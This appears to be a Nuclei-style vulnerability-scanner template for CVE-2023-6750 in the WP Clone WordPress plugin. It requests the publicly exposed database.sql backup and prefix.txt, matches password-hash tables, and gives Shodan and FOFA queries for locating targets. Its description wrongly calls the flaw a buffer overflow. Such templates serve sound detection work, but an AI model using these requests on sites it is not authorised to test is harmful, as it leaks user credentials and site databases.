id: CVE-2023-6750 info: name: WordPress WP Clone <= 2.4.2 - Database Backup Exposure author: pussycat0x severity: critical description: | Clone WordPress plugin < 2.4.3 contains a buffer overflow caused by storing in-progress backup information in publicly accessible buffer files at a static file path, letting attackers access sensitive backup data, exploit requires no special privileges impact: | Attackers can access sensitive backup information, potentially leading to data disclosure or manipulation. remediation: | Update to version 2.4.3 or later. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-clone-by-wp-academy/clone-242-sensitive-information-exposure - https://plugins.trac.wordpress.org/changeset/3012647/wp-clone-by-wp-academy - https://nvd.nist.gov/vuln/detail/CVE-2023-6750 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-6750 epss-score: 0.01961 epss-percentile: 0.77741 cwe-id: CWE-200 cpe: cpe:2.3:a:developer:clone:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 product: clone framework: wordpress shodan-query: http.html:"wp-clone-by-wp-academy" fofa-query: body="wp-clone-by-wp-academy" tags: cve,cve2023,wp,wp-plugin,wordpress,wp-clone,backup flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/wp-content/uploads/wp-clone/wpclone_backup/database.sql" matchers-condition: and matchers: - type: word part: body words: - "CREATE TABLE" - "INSERT INTO" condition: and - type: word part: body words: - "wp_users" - "wp_options" - "user_pass" condition: or - type: status status: - 200 extractors: - type: regex name: db_table part: body group: 1 regex: - "CREATE TABLE[^`]*`([^`]+)`" - method: GET path: - "{{BaseURL}}/wp-content/uploads/wp-clone/wpclone_backup/prefix.txt" matchers-condition: and matchers: - type: regex part: body regex: - "^[a-zA-Z0-9_]+$" - type: status status: - 200 # digest: 490a0046304402200b5f3e1a4b775e4a64ecae524c6ca40323deadeeaac95c2b55b612d1acbfbf4a0220545ced92338e01938f6b30b0b30e9461ee8de39f169bdccf174154d4dc33e07b:922c64590222798bb761d5b6d8e72950